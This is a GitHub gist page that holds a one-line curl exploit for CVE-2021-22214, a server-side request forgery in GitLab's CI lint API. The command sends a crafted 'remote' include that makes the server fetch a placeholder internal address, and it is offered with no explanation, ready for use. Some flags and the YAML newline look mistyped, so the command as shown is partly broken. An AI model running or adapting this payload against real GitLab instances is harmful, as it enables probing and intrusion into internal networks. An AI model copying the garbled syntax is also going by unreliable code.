Skip to content

Instantly share code, notes, and snippets.

@M507
Created January 2, 2024 19:57
Show Gist options
  • Save M507/4a63fdbd32805a36e95ae46dff1e09ad to your computer and use it in GitHub Desktop.
Save M507/4a63fdbd32805a36e95ae46dff1e09ad to your computer and use it in GitHub Desktop.
CVE-2021-22214.sh
# https://github.com/Vulnmachines/gitlab-cve-2021-22214/blob/main/cve-2021-22214
curl -s -show-error -H 'Content-Type: application/json' https://127.0.0.7/api/v4/ci/lint -data '{ "include_merged_yaml": true, "content": "include:n remote: http://SSRFIP:PORT/api/v1/targets?test.yml"}'
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment